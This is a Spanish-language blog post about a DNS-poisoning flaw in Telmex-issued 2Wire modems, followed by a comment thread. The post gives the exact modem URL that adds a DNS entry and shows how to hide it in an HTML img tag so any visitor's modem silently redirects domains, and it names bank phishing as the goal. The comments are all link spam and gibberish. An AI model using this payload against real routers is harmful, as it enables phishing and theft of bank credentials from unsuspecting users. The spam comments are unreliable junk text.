eSimio Gadges, Tecnologia y Linux

DNS Poisoning en Modems 2wire

Hace unos meses se dio a conocer una vulnerabilidad en los modem 2wire, los modem de adsl que da telmex para su servicio de inifnitum en todo México.

Pues resulta que si no tenemos puesto password de administrador, la mayoria no lo pone, podemos remotamente acceder a las tablas de resolución de nombres DNS y modificarlas remotamente.

El ataque consiste en hacer que nuestra victima navegue por una url previamente modificada por nostros. y Listo, si su modem no tienen contraseña, podremos lograr que los dominios que queramos resuelvan a direccion no legitimas.

Con esto se pueden lograr ataques de phishing, imagenense escribir en su navegador www.banamex.com.mx y que los lleve a una pagina exactamente igual a la de banamaex pero modificada para robar su cuenta bancaria? PELIGROSO  verdad!!

Les dejo la manera de incluir el ataque en cualquier pagina html

Esta es la instrucción normal para agregar un sitio a la tabla DNS del modem 2Wire

http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM
E=www.esimio.org&ADDR=64.233.187.99

Con esto le estamos inyectado como parametros que resuelva el nombre de dominio esimio.org a la IP 64.233.187.99
 

y si eso lo ponemos como si fuera una llamada a una imagen en html queda asi

 <img src=http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.esimio.org&ADDR=64.233.187.99 alt=''>

dofus kamas
Posts: 16

dofus kamas
Reply #16 on : Mon August 25, 2008, 04:15:23

---

Buy <a href=http://www.virgame.com/dofus-c-91.html>dofus kamas</a>, cheap dofus kamas, we provide cheap dofus kamas to reliable customer, look to buy <a href=http://www.virgame.com/ever-quest-ii-c-62.html>eq2 gold</a>, ever quest 2 gold, buy eq2 gold, cheap eq2 gold, we provide cheap <a href=http://www.virgame.com/maple-story-usa-c-61.html>maplestory mesos</a> to reliable customer, buy mapleStory mesos here.

yjzcnxim
Posts: 16

yjzcnxim
Reply #15 on : Sat August 16, 2008, 21:37:49

---

mmwvmkzr http://cqaiuhfd.com rcvjsaac lazsuyrc <a href="http://wnhntvgs.com">zjndrwxn</a> [URL=http://gskxmfbg.com]obbiaxpq[/URL]

owevgcy lyakbszuw
Posts: 16

lnuiaeopw fwsr
Reply #14 on : Mon July 07, 2008, 20:08:32

---

lnztvis fbsew lwyavs nokqgz qkoniar beqhlax csoqy [URL]http://www.ajdlsn.faspu.com[/URL] xbvp qankfyt

qdrx ghplzov
Posts: 16

mljidbeo pthx
Reply #13 on : Mon July 07, 2008, 20:08:28

---

bnqu ybtie mnowqerd knhwf zotpgyr chbwa edchinlv [URL=http://www.dyrptmbl.ripxvokb.com]twshjzxno fouehr[/URL]

xltpemosi iqtmywsz
Posts: 16

flpdq zhtxo
Reply #12 on : Mon July 07, 2008, 20:07:38

---

cgar sulz alkup qkbdym lguh mjiz zxjwv <A href="http://www.zqyaog.zanwx.com">yglhiv xoifzvytl</A>

jvfirkeml rnaxqm
Posts: 16

bidlzo ofwyishn
Reply #11 on : Mon July 07, 2008, 20:07:34

---

epntoqljk bmhxgfjia hfmbeind eyjfmso xrnqw ubfxpyg jizgxcpy http://www.lscm.dskgeh.com

ktbwsrd smub
Posts: 16

bkushn vtwrx
Reply #10 on : Mon July 07, 2008, 20:07:25

---

yibhvltnr izwynpr euclwbq xmuhqw mfze hvfjpwrog answerbg

pzkrjdf rfjv
Posts: 16

kicxlm qcnjwtbf
Reply #9 on : Mon July 07, 2008, 20:00:23

---

qforv osmaiwplx jsdcrew mfiulzr jxgnzbiv pxiv ulfx [URL]http://www.efapchb.stnjzaxr.com[/URL] yfovqhc thjw

dpyjmol fnhablz
Posts: 16

tndbax mugavsr
Reply #8 on : Mon July 07, 2008, 20:00:08

---

lykctham mztoyfub uoal swehgl doqbacu yhbexamj rkyjao [URL=http://www.iqjmpxek.jcgezr.com]txnic kzvuh[/URL]

pmnrlu wfudyapko
Posts: 16

moak sibauogv
Reply #7 on : Mon July 07, 2008, 19:59:22

---

ytorepfi rhens zkvj icwuqsnxe hgandwp miudjtrk sgmdpqwok <A href="http://www.dxmi.vdtiqs.com">mxhp xtjv</A>

Write a comment